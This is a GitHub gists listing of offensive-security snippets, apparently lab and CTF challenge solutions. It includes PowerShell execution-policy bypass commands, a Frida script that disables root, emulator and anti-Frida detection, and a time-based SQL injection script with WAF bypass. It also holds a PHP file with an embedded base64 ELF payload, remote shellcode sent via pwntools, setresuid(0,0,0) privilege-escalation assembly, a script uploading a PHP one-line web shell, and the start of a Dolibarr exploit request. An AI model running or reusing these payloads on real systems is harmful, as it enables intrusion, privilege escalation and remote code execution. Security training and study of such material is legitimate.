Skip to content

Instantly share code, notes, and snippets.

@sharpicx
sharpicx / PowershellBypass.ps1
Created July 14, 2024 18:13 — forked from adithyan-ak/PowershellBypass.ps1
Bypass the PowerShell Execution Policy Restrictions
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/
powershell.exe -ExecutionPolicy Bypass
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
Set-ExecutionPolicy Bypass -Scope Process
@sharpicx
sharpicx / script.js
Created July 6, 2024 12:47
challenge android
Java.perform(() => {
let RootDetector = Java.use("***.*****.**********.RootDetector");
RootDetector["isRooted"].implementation = function () {
return false; // only for boolean function calling
};
let EmulatorDetector = Java.use("***.*****.*********.EmulatorDetector");
EmulatorDetector["isEmulator"].implementation = function () {
return false; // only for boolean function calling
};
let AntiFrida = Java.use("***.*****.*********.AntiFrida");
@sharpicx
sharpicx / another_endpoint.py
Last active June 10, 2024 08:11
SQL Time-Based Scripting Waf Bypass
import time
import requests
import string
characters = string.ascii_letters + string.digits
ascii_values = [ord(char) for char in characters]
pos = 1
database_name = ''
searching = True
@sharpicx
sharpicx / peler.php
Last active June 3, 2024 10:51
HTR: Slump
<?php
$hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAIARAAAAAAAAAAAAAEAAOAAHAEAAGwAaAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAA
@sharpicx
sharpicx / a.py
Created June 2, 2024 03:30
HTR: Demo-Socket
from pwn import *
context(arch="i386", os="linux", log_level="debug")
r = remote("192.168.1.100", 12321)
bin_sh = b""
bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4"
bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04"
bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06"
bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60"
@sharpicx
sharpicx / a.js
Created June 2, 2024 03:29
HMV: Wild
const axios = require("axios");
const readline = require("readline");
const cheerio = require("cheerio");
const colors = {
reset: "\x1b[0m",
bright: "\x1b[1m",
dim: "\x1b[2m",
underscore: "\x1b[4m",
blink: "\x1b[5m",
@sharpicx
sharpicx / a.asm
Created June 2, 2024 03:28
HTR: Magnum
section .text
global main
main:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0xd0
int 0x80 ; setresuid(0, 0, 0)
@sharpicx
sharpicx / a.py
Last active June 3, 2024 04:30
HTR: Woof
import requests
import random
import string
def upload_txt_file(file_name):
file_data = "<?=`$_POST[0]`?>"
upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
data = {"cmd": "upload", "target": "l1_Lw"}
response = requests.post(upload_uri, files=files, data=data)
@sharpicx
sharpicx / test.py
Created May 10, 2024 13:10
grab all tweets
from twikit import Client
import json
import pandas as pd
import itertools
USERNAME = 'username here'
EMAIL = 'email here'
PASSWORD = 'password here'
client = Client('en-US')
@sharpicx
sharpicx / http.req
Created March 5, 2024 04:13
dolibarr - puffy
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close